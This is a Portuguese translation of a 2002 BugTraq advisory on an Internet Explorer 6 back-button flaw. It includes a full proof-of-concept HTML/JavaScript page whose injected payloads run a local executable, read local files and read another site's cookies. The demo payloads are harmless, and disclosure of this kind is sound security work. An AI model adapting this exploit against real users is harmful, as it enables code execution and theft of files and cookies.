 Até tu, Brutus? |
 |
| Mais uma falha gritante do Internet Explorer da Micro$oft: o botão Voltar (Back) | |
| Publicação: BugTraq Assunto: Usar o botão Voltar no IE é perigoso Data: Apr 14 2002 8:06PM Autor: Andreas Sandblad <sandblad@acc.umu.se> Message-ID: <Pine.LNX.4.44.0204142159210.11552-100000@mao.acc.umu.se> |
|
Software: Pelo menos Internet Explorer 6.0. Ambiente Testado: Windows 2000 pro, XP. Classificação: Risco Médio porque precisa da interação do usuário. Impacto: Ler cookies/arquivos locais e executar código (disparado quando o usuário clica no botão Voltar). Patch: Nenhum. Notificação: Microsoft contactada em 12 Nov 2001, informação adicional dada em 25 Mar 2002. Solução: Desativar active scripting ou nunca _ _ usar o botão Voltar. |
|
| o' \,=./ `o (o o) -----ooO--(_)--Ooo----- |
|
IE permite urls contendo o protocolo javascript na lista de história. Código injetado na url irá operar na mesma zona/domínio da última url visitada. A url javascript pode ser preparada para disparar quando o usuário clicar no botão Voltar. A reação normal quando uma página falha ao ser carregada é clicar o botão Voltar. A página de erro mostrada pelo IE opera na zona do computador local (res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# no Win2000). Consequentemente, podemos executar código e ler arquivos locais. |
|
O exploit funciona da seguinte forma: Clique um dos links e depois o botão Voltar. Observação: O exploit só foi testado no IE 6.0 com todos os patches, no Win XP e Win2000 Pro (imagino que outros sistemas operacionais também sejam vulneráveis). Winmine.exe e teste.txt precisam existir. |
|
| -------------------------- CORTE AQUI ------------------------------- <html> <h1>Clique no link e depois no botão Voltar para disparar o script.</h1> <a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')"> Executar Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br> <a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')"> Executar Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br> <a href="javascript:readFile('file:///c:/teste.txt')"> Ler c:\teste.txt (precisa ser criado)</a><br> <a href="javascript:readCookie('http://www.google.com/')"> Ler cookie do Google</a> <script> // badUrl = "http://www.nonexistingdomain.se"; // Usar se não for XP badUrl = "res:"; function execFile(file){ s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 '; s+= 'CODEBASE='+file+'></OBJECT>'; backBug(badUrl,s); } function readFile(file){ s = '<iframe name=i src='+file+' style=display:none onload='; s+= 'alert(i.document.body.innerText)></iframe>'; backBug(badUrl,s); } function readCookie(url){ s = '<script>alert(document.cookie);close();<"+"/script>'; backBug(url,s); } function backBug(url,payload){ len = history.length; page = document.location; s = "javascript:if (history.length!="+len+") {"; s+= "open('javascript:document.write(\""+payload+"\")')"; s+= ";history.back();} else '<script>location=\""+url s+= "\";document.title=\""+page+"\";<"+"/script>';"; location = s; } </script> </html> -------------------------- CORTE AQUI ------------------------------- |
|
| DECLARAÇÃO | |
| Andreas Sandblad não é responsável
pelo mau uso das informações contidas neste alerta.
As opiniões expressas são minhas e não de qualquer
empresa. Em hipótese alguma o autor poderá ser responsabilizado
por qualquer dano surgido ou provocado que tenha conexão
com o uso ou com a divulgação deste alerta. Qualquer
uso desta informação será por conta e risco
do usuário. O site NumaBoa apenas traduziu e divulgou esta informação pública. Portanto, da mesma forma que o autor, não pode ser responsabilizado pelo mau uso ou danos causados pelo uso da informação contida neste alerta. |
|
| Sugestões e Comentários | |
| Please send suggestions and comments to: _ _ sandblad@acc.umu.se Andreas Sandblad, student in Engineering Physics at the University of Umea, Sweden. |
|
| Link Original | |
 http://online.securityfocus.com/archive/1/267561 |
|
Indique esta página